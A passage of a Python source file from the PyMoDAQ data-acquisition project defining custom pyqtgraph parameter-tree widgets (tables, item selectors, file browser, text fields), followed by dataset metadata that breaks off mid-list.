Combo_pb(QtWidgets.QWidget):\n\n def __init__(self, items=[]):\n\n super(Combo_pb, self).__init__()\n self.items = items\n self.initUI()\n self.count = self.combo.count\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.combo = QtWidgets.QComboBox()\n self.combo.addItems(self.items)\n self.add_pb = QtWidgets.QPushButton()\n self.add_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Add2.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.add_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.combo)\n self.hor_layout.addWidget(self.add_pb)\n self.hor_layout.setSpacing(0)\n self.hor_layout.setContentsMargins(0, 0, 0, 0)\n self.add_pb.setMaximumWidth(25)\n self.setLayout(self.hor_layout)\n self.currentText = self.combo.currentText\n\n\nclass TableParameterItem(WidgetParameterItem):\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n \"\"\"\n Check for changement in the Widget tree.\n \"\"\"\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.widget)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make and initialize an instance of Table_custom.\n\n Returns\n -------\n table : instance of Table_custom.\n The initialized table.\n\n See Also\n --------\n Table_custom\n \"\"\"\n opts = self.param.opts\n w = Table_custom()\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n w.setColumnCount(2)\n if 'header' in opts:\n w.setHorizontalHeaderLabels(self.param.opts['header'])\n if 'height' not in opts:\n opts['height'] = 200\n w.setMaximumHeight(opts['height'])\n # self.table.setReadOnly(self.param.opts.get('readonly', False))\n w.value = w.get_table_value\n w.setValue = w.set_table_value\n w.sigChanged = w.itemChanged\n return w\n\n\nclass Table_custom(QtWidgets.QTableWidget):\n \"\"\"\n ============== ===========================\n *Attributes** **Type**\n *valuechanged* instance of pyqt Signal\n *QtWidgets* instance of QTableWidget\n ============== ===========================\n \"\"\"\n\n valuechanged = Signal(OrderedDict)\n\n def __init__(self):\n QtWidgets.QTableWidget.__init__(self)\n\n def get_table_value(self):\n \"\"\"\n Get the contents of the self coursed table.\n\n Returns\n -------\n data : ordered dictionnary\n The getted values dictionnary.\n \"\"\"\n data = OrderedDict([])\n for ind in range(self.rowCount()):\n item0 = self.item(ind, 0)\n item1 = self.item(ind, 1)\n if item0 is not None and item1 is not None:\n try:\n data[item0.text()] = float(item1.text())\n except Exception:\n data[item0.text()] = item1.text()\n return data\n\n def set_table_value(self, data_dict):\n \"\"\"\n Set the data values dictionnary to the custom table.\n\n =============== ====================== ================================================\n **Parameters** **Type** **Description**\n *data_dict* ordered dictionnary the contents to be stored in the custom table\n =============== ====================== ================================================\n \"\"\"\n try:\n self.setRowCount(len(data_dict))\n self.setColumnCount(2)\n for ind, (key, value) in enumerate(data_dict.items()):\n item0 = QtWidgets.QTableWidgetItem(key)\n item0.setFlags(item0.flags() ^ Qt.ItemIsEditable)\n if isinstance(value, float):\n item1 = QtWidgets.QTableWidgetItem('{:.6e}'.format(value))\n else:\n item1 = QtWidgets.QTableWidgetItem(str(value))\n item1.setFlags(item1.flags() ^ Qt.ItemIsEditable)\n self.setItem(ind, 0, item0)\n self.setItem(ind, 1, item1)\n # self.valuechanged.emit(data_dict)\n\n except Exception as e:\n pass\n\n\nclass TableParameter(Parameter):\n \"\"\"\n =============== =================================\n **Attributes** **Type**\n *itemClass* instance of TableParameterItem\n *Parameter* instance of pyqtgraph parameter\n =============== =================================\n \"\"\"\n itemClass = TableParameterItem\n \"\"\"Editable string; displayed as large text box in the tree.\"\"\"\n\n # def __init(self):\n # super(TableParameter,self).__init__()\n\n def setValue(self, value):\n self.opts['value'] = value\n self.sigValueChanged.emit(self, value)\n\n\nregisterParameterType('table', TableParameter, override=True)\n\n\nclass TableViewParameterItem(WidgetParameterItem):\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n \"\"\"\n Check for changement in the Widget tree.\n \"\"\"\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.widget)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make and initialize an instance of Table_custom.\n\n Returns\n -------\n table : instance of Table_custom.\n The initialized table.\n\n See Also\n --------\n Table_custom\n \"\"\"\n menu = False\n opts = self.param.opts\n if 'menu' in opts:\n menu = opts['menu']\n w = TableViewCustom(menu=menu)\n\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n\n w.setMaximumHeight(200)\n # self.table.setReadOnly(self.param.opts.get('readonly', False))\n w.value = w.get_table_value\n w.setValue = w.set_table_value\n w.sigChanged = w.valueChanged\n return w\n\n def optsChanged(self, param, opts):\n \"\"\"\n | Called when any options are changed that are not name, value, default, or limits.\n |\n | If widget is a SpinBox, pass options straight through.\n | So that only the display label is shown when visible option is toggled.\n\n =============== ================================== ==============================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter the parameter to check\n *opts* string list the associated options list\n =============== ================================== ==============================\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'readonly' in opts:\n self.updateDefaultBtn()\n if isinstance(self.widget, (QtWidgets.QCheckBox, ColorButton.ColorButton)):\n self.widget.setEnabled(not opts['readonly'])\n\n if 'delegate' in opts:\n styledItemDelegate = QtWidgets.QStyledItemDelegate()\n styledItemDelegate.setItemEditorFactory(opts['delegate']())\n self.widget.setItemDelegate(styledItemDelegate)\n\n if 'menu' in opts:\n self.widget.setmenu(opts['menu'])\n\n\nclass TableViewCustom(QtWidgets.QTableView):\n \"\"\"\n ============== ===========================\n *Attributes** **Type**\n *valuechanged* instance of pyqt Signal\n *QtWidgets* instance of QTableWidget\n ============== ===========================\n \"\"\"\n\n valueChanged = Signal(list)\n add_data_signal = Signal(int)\n remove_row_signal = Signal(int)\n load_data_signal = Signal()\n save_data_signal = Signal()\n\n def __init__(self, menu=False):\n super().__init__()\n self.setmenu(menu)\n\n def setmenu(self, status):\n if status:\n self.menu = QtWidgets.QMenu()\n self.menu.addAction('Add new', self.add)\n self.menu.addAction('Remove selected row', self.remove)\n self.menu.addAction('Clear all', self.clear)\n self.menu.addSeparator()\n self.menu.addAction('Load as txt', lambda: self.load_data_signal.emit())\n self.menu.addAction('Save as txt', lambda: self.save_data_signal.emit())\n else:\n self.menu = None\n\n def clear(self):\n self.model().clear()\n\n def add(self):\n self.add_data_signal.emit(self.currentIndex().row())\n\n def remove(self):\n self.remove_row_signal.emit(self.currentIndex().row())\n\n def data_has_changed(self, topleft, bottomright, roles):\n self.valueChanged.emit([topleft, bottomright, roles])\n\n def get_table_value(self):\n \"\"\"\n\n \"\"\"\n return self.model()\n\n def set_table_value(self, data_model):\n \"\"\"\n\n \"\"\"\n try:\n self.setModel(data_model)\n self.model().dataChanged.connect(self.data_has_changed)\n except Exception as e:\n pass\n\n def contextMenuEvent(self, event):\n if self.menu is not None:\n self.menu.exec(event.globalPos())\n\n\nclass TableViewParameter(Parameter):\n \"\"\"\n =============== =================================\n **Attributes** **Type**\n *itemClass* instance of TableParameterItem\n *Parameter* instance of pyqtgraph parameter\n =============== =================================\n \"\"\"\n itemClass = TableViewParameterItem\n\n def setValue(self, value):\n self.opts['value'] = value\n self.sigValueChanged.emit(self, value)\n\n\nregisterParameterType('table_view', TableViewParameter, override=True)\n\n\nclass ItemSelectParameterItem(WidgetParameterItem):\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n \"\"\"\n\n \"\"\"\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.widget)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n | Make and initialize an instance of ItemSelect_pb with itemselect value.\n | Connect the created object with the buttonClicked function.\n\n \"\"\"\n opts = self.param.opts\n w = ItemSelect_pb()\n w.itemselect.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n if 'height' in opts:\n w.itemselect.setMaximumHeight(opts['height'])\n else:\n w.itemselect.setMaximumHeight(70)\n # w.setReadOnly(self.param.opts.get('readonly', False))\n if 'show_pb' in opts:\n w.add_pb.setVisible(opts['show_pb'])\n else:\n w.add_pb.setVisible(False)\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n w.value = w.itemselect.get_value\n w.setValue = w.itemselect.set_value\n w.sigChanged = w.itemselect.itemSelectionChanged\n w.add_pb.clicked.connect(self.buttonClicked)\n return w\n\n def buttonClicked(self):\n \"\"\"\n Append to the param attribute the dictionnary obtained from the QtWidget add parameter procedure.\n \"\"\"\n\n text, ok = QtWidgets.QInputDialog.getText(None, \"Enter a value to add to the parameter\",\n \"String value:\", QtWidgets.QLineEdit.Normal)\n if ok and not (text == \"\"):\n all = self.param.value()['all_items']\n all.append(text)\n sel = self.param.value()['selected']\n sel.append(text)\n val = dict(all_items=all, selected=sel)\n self.param.setValue(val)\n self.param.sigValueChanged.emit(self.param, val)\n\n def optsChanged(self, param, opts):\n \"\"\"\n Called when any options are changed that are not name, value, default, or limits.\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'show_pb' in opts:\n self.widget.add_pb.setVisible(opts['show_pb'])\n\n\nclass ItemSelect_pb(QtWidgets.QWidget):\n def __init__(self):\n\n super(ItemSelect_pb, self).__init__()\n self.initUI()\n\n def initUI(self):\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.itemselect = ItemSelect()\n self.add_pb = QtWidgets.QPushButton()\n self.add_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Add2.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.add_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.itemselect)\n self.hor_layout.addWidget(self.add_pb)\n self.hor_layout.setSpacing(0)\n\n self.setLayout(self.hor_layout)\n\n\nclass ItemSelect(QtWidgets.QListWidget):\n def __init__(self):\n QtWidgets.QListWidget.__init__(self)\n\n def get_value(self):\n \"\"\"\n Get the dictionnary of values contained in the QtWidget attribute.\n\n Returns\n -------\n dictionnary\n The dictionnary of all_items compared to the slelectedItems.\n \"\"\"\n selitems = [item.text() for item in self.selectedItems()]\n allitems = [item.text() for item in self.all_items()]\n return dict(all_items=allitems, selected=selitems)\n\n def all_items(self):\n \"\"\"\n Get the all_items list from the self QtWidget attribute.\n\n Returns\n -------\n list\n The item list.\n \"\"\"\n return [self.item(ind) for ind in range(self.count())]\n\n def set_value(self, values):\n \"\"\"\n Set values to the all_items attributes filtering values by the 'selected' key.\n\n =============== ============== =======================================\n **Parameters** **Type** **Description**\n *values* dictionnary the values dictionnary to be setted.\n =============== ============== =======================================\n \"\"\"\n allitems = [item.text() for item in self.all_items()]\n if allitems != values['all_items']:\n self.clear()\n self.addItems(values['all_items'])\n QtWidgets.QApplication.processEvents()\n for item in self.all_items():\n if item.text() in values['selected']:\n item.setSelected(True)\n\n\nclass ItemSelectParameter(Parameter):\n \"\"\"\n Editable string; displayed as large text box in the tree.\n\n =============== ======================================\n **Attributes** **Type**\n *itemClass* instance of ItemSelectParameterItem\n *sigActivated* instance of pyqt Signal\n =============== ======================================\n \"\"\"\n itemClass = ItemSelectParameterItem\n sigActivated = Signal(object)\n\n def activate(self):\n \"\"\"\n Activate the \"Activated\" signal attribute0\n \"\"\"\n self.sigActivated.emit(self)\n self.emitStateChanged('activated', None)\n\n\nregisterParameterType('itemselect', ItemSelectParameter, override=True)\n\n\nclass ActionParameterItem(pTypes.ActionParameterItem):\n def __init__(self, param, depth):\n super().__init__(param, depth)\n\n if 'title' in param.opts:\n name = param.opts['title']\n else:\n name = param.name()\n self.button.setText(name)\n\n\nclass ActionParameter(pTypes.ActionParameter):\n \"\"\"Used for displaying a button within the tree.\"\"\"\n itemClass = ActionParameterItem\n\n\nregisterParameterType('action', ActionParameter, override=True)\n\n\nclass file_browserParameterItem(WidgetParameterItem):\n\n def __init__(self, param, depth):\n self.filetype = False\n super().__init__(param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.w)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make an initialized file_browser object with parameter options dictionnary ('readonly' key)0\n\n Returns\n -------\n w : filebrowser\n The initialized file browser.\n\n See Also\n --------\n file_browser\n \"\"\"\n if 'filetype' in self.param.opts:\n self.filetype = self.param.opts['filetype']\n else:\n self.filetype = True\n\n self.w = file_browser(self.param.value(), file_type=self.filetype)\n if 'tip' in self.param.opts:\n self.w.setToolTip(self.param.opts['tip'])\n # self.file_browser.setMaximumHeight(100)\n self.w.base_path_edit.setReadOnly(self.param.opts['readonly'])\n self.w.value = self.w.get_value\n self.w.setValue = self.w.set_path\n self.w.sigChanged = self.w.value_changed\n return self.w\n\n\nclass file_browser(QtWidgets.QWidget):\n \"\"\"\n ================ =========================\n **Attributes** **Type**\n *value_changed* instance of pyqt Signal\n *path* string\n ================ =========================\n\n See Also\n --------\n browse_path\n \"\"\"\n value_changed = Signal(str)\n\n def __init__(self, init_path='D:/Data', file_type=False):\n\n super(file_browser, self).__init__()\n self.filetype = file_type\n self.path = init_path\n self.initUI()\n\n self.base_path_browse_pb.clicked.connect(self.browse_path)\n\n def browse_path(self):\n \"\"\"\n Browse the path attribute if exist.\n\n See Also\n --------\n set_path\n \"\"\"\n if self.filetype is True:\n folder_name = QtWidgets.QFileDialog.getOpenFileName(None, 'Choose File', os.path.split(self.path)[0])[0]\n elif self.filetype is False:\n folder_name = QtWidgets.QFileDialog.getExistingDirectory(None, 'Choose Folder', self.path)\n\n elif self.filetype == \"save\":\n folder_name = QtWidgets.QFileDialog.getSaveFileName(None, 'Enter a Filename', os.path.split(self.path)[0])[\n 0]\n\n if not (not (folder_name)): # execute if the user didn't cancel the file selection\n self.set_path(folder_name)\n self.value_changed.emit(folder_name)\n\n def set_path(self, path_file):\n \"\"\"\n Set the base path attribute with the given path_file.\n\n =============== =========== ===========================\n **Parameters** **Type** **Description**\n *path_file* string the pathname of the file\n =============== =========== ===========================\n \"\"\"\n if isinstance(path_file, Path):\n path_file = str(path_file)\n self.base_path_edit.setPlainText(path_file)\n self.path = path_file\n\n def get_value(self):\n \"\"\"\n Get the value of the base_path_edit attribute.\n\n Returns\n -------\n string\n the path name\n \"\"\"\n return self.base_path_edit.toPlainText()\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.base_path_edit = QtWidgets.QPlainTextEdit(self.path)\n self.base_path_edit.setMaximumHeight(50)\n self.base_path_browse_pb = QtWidgets.QPushButton()\n self.base_path_browse_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Browse_Dir_Path.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.base_path_browse_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.base_path_edit)\n\n verlayout = QtWidgets.QVBoxLayout()\n verlayout.addWidget(self.base_path_browse_pb)\n verlayout.addStretch()\n self.hor_layout.addLayout(verlayout)\n self.hor_layout.setSpacing(0)\n self.setLayout(self.hor_layout)\n\n\nclass file_browserParameter(Parameter):\n \"\"\"\n Editable string; displayed as large text box in the tree.\n See Also\n --------\n file_browserParameterItem\n \"\"\"\n itemClass = file_browserParameterItem\n\n\nregisterParameterType('browsepath', file_browserParameter, override=True)\n\n\nclass Plain_text_pbParameterItem(pTypes.WidgetParameterItem):\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.w)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make and initialize an instance of Plain_text_pb object from parameter options dictionnary (using 'readonly' key).\n\n Returns\n -------\n Plain_text_pb object\n The initialized object.\n\n See Also\n --------\n Plain_text_pb, buttonClicked\n \"\"\"\n self.w = Plain_text_pb()\n self.w.text_edit.setReadOnly(self.param.opts.get('readonly', False))\n self.w.value = self.w.get_value\n self.w.setValue = self.w.set_value\n self.w.sigChanged = self.w.value_changed\n self.w.add_pb.clicked.connect(self.buttonClicked)\n return self.w\n\n def buttonClicked(self):\n text, ok = QtWidgets.QInputDialog.getText(None, \"Enter a value to add to the parameter\",\n \"String value:\", QtWidgets.QLineEdit.Normal)\n if ok and not (text == \"\"):\n self.param.setValue(self.param.value() + '\\n' + text)\n\n\nclass Plain_text_pb(QtWidgets.QWidget):\n \"\"\"\n ================ ========================\n **Attributes** **Type**\n *value_changed* instance of pyqt Signal\n ================ ========================\n\n See Also\n --------\n initUI, emitsignal\n \"\"\"\n value_changed = Signal(str)\n\n def __init__(self):\n\n super(Plain_text_pb, self).__init__()\n\n self.initUI()\n self.text_edit.textChanged.connect(self.emitsignal)\n\n def emitsignal(self):\n \"\"\"\n Emit the value changed signal from the text_edit attribute.\n \"\"\"\n text = self.text_edit.toPlainText()\n self.value_changed.emit(text)\n\n def set_value(self, txt):\n \"\"\"\n Set the value of the text_edit attribute.\n\n =============== =========== ================================\n **Parameters** **Type** **Description**\n *txt* string the string value to be setted\n =============== =========== ================================\n \"\"\"\n self.text_edit.setPlainText(txt)\n\n def get_value(self):\n \"\"\"\n Get the value of the text_edit attribute.\n\n Returns\n -------\n string\n The string value of text_edit.\n \"\"\"\n return self.text_edit.toPlainText()\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.text_edit = QtWidgets.QPlainTextEdit()\n self.text_edit.setReadOnly(True)\n self.text_edit.setMaximumHeight(50)\n\n self.add_pb = QtWidgets.QPushButton()\n self.add_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Add2.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.add_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.text_edit)\n\n verlayout = QtWidgets.QVBoxLayout()\n verlayout.addWidget(self.add_pb)\n verlayout.addStretch()\n self.hor_layout.addLayout(verlayout)\n self.hor_layout.setSpacing(0)\n self.setLayout(self.hor_layout)\n\n\nclass Plain_text_pbParameter(Parameter):\n \"\"\"Editable string; displayed as large text box in the tree.\"\"\"\n itemClass = Plain_text_pbParameterItem\n sigActivated = Signal(object)\n\n def activate(self):\n \"\"\"\n Send the Activated signal.\n \"\"\"\n self.sigActivated.emit(self)\n self.emitStateChanged('activated', None)\n\n\nregisterParameterType('text_pb', Plain_text_pbParameter, override=True)\n\n\nclass TextParameterItemCustom(pTypes.TextParameterItem):\n def __init__(self, param, depth):\n super(TextParameterItemCustom, self).__init__(param, depth)\n\n self.textBox.setMaximumHeight(50)\n\n\nclass TextParameter(Parameter):\n \"\"\"Editable string; displayed as large text box in the tree.\"\"\"\n itemClass = TextParameterItemCustom\n\n\nregisterParameterType('text', TextParameter, override=True)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = QTimeCustom()\n ex.setMinuteIncrement(30)\n ex.show()\n sys.exit(app.exec_())\n", "sub_path": "src/pymodaq/daq_utils/parameter/oldpymodaq_ptypes.py", "file_name": "oldpymodaq_ptypes.py", "file_ext": "py", "file_size_in_byte": 57090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameterItem", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 28, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameterItem.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameterItem", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 38, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameter", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 47, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 67, "usage_type": "call"}, {"api_name": "pyqtgraph.widgets.SpinBox.SpinBox", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.SpinBox", "line_number": 70, "usage_type": "name"}, {"api_name": "decimal.Decimal", "line_number": 93, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 142, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 142, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 160, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 160, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLabel", "line_number": 161, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 161, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 162, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 162, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 163, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 163, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 175, "usage_type": "attribute"}, {"api_name": "qtpy.QtGui", "line_number": 175, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QByteArray", "line_number": 176, "usage_type": "call"}, {"api_name": "qtpy.QtGui.QImage.fromData", "line_number": 177, "usage_type": "call"}, {"api_name": "qtpy.QtGui.QImage", "line_number": 177, "usage_type": "attribute"}, {"api_name": "qtpy.QtGui", "line_number": 177, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap.fromImage", "line_number": 178, "usage_type": "call"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 178, "usage_type": "attribute"}, {"api_name": "qtpy.QtGui", "line_number": 178, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTimeEdit", "line_number": 200, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 200, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 210, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Slot", "line_number": 223, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 223, "usage_type": "argument"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 228, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 228, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 260, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 260, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QSlider", "line_number": 261, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 261, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.Horizontal", "line_number": 261, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 261, "usage_type": "name"}, {"api_name": "pymodaq.daq_utils.daq_utils.scroll_log", "line_number": 290, "usage_type": "call"}, {"api_name": "pymodaq.daq_utils.daq_utils.scroll_linear", "line_number": 292, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 326, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 326, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 332, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 332, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 332, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QSize", "line_number": 377, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 385, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 385, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 392, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 392, "usage_type": "name"}, {"api_name": "pymodaq.daq_utils.gui_utils.widgets.QLED", "line_number": 407, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 415, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 415, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.ColorButton.ColorButton", "line_number": 421, "usage_type": "call"}, {"api_name": "pyqtgraph.widgets.ColorButton", "line_number": 421, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.GradientWidget.GradientWidget", "line_number": 431, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDateTimeEdit", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 438, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDateTime", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QDate.currentDate", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QDate", "line_number": 438, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QTime.currentTime", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 438, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QDateEdit", "line_number": 448, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 448, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDate", "line_number": 448, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QDate.currentDate", "line_number": 448, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 459, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime.currentTime", "line_number": 459, "usage_type": "call"}, {"api_name": "pymodaq.daq_utils.gui_utils.widgets.QLED", "line_number": 468, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QLabel", "line_number": 475, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 475, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.limitsChanged", "line_number": 490, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 490, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.OtherFocusReason", "line_number": 504, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 504, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.SpinBox.SpinBox", "line_number": 505, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.SpinBox", "line_number": 505, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 537, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 537, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 541, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 541, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.ColorButton.ColorButton", "line_number": 541, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.ColorButton", "line_number": 541, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.valueChanged", "line_number": 565, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 565, 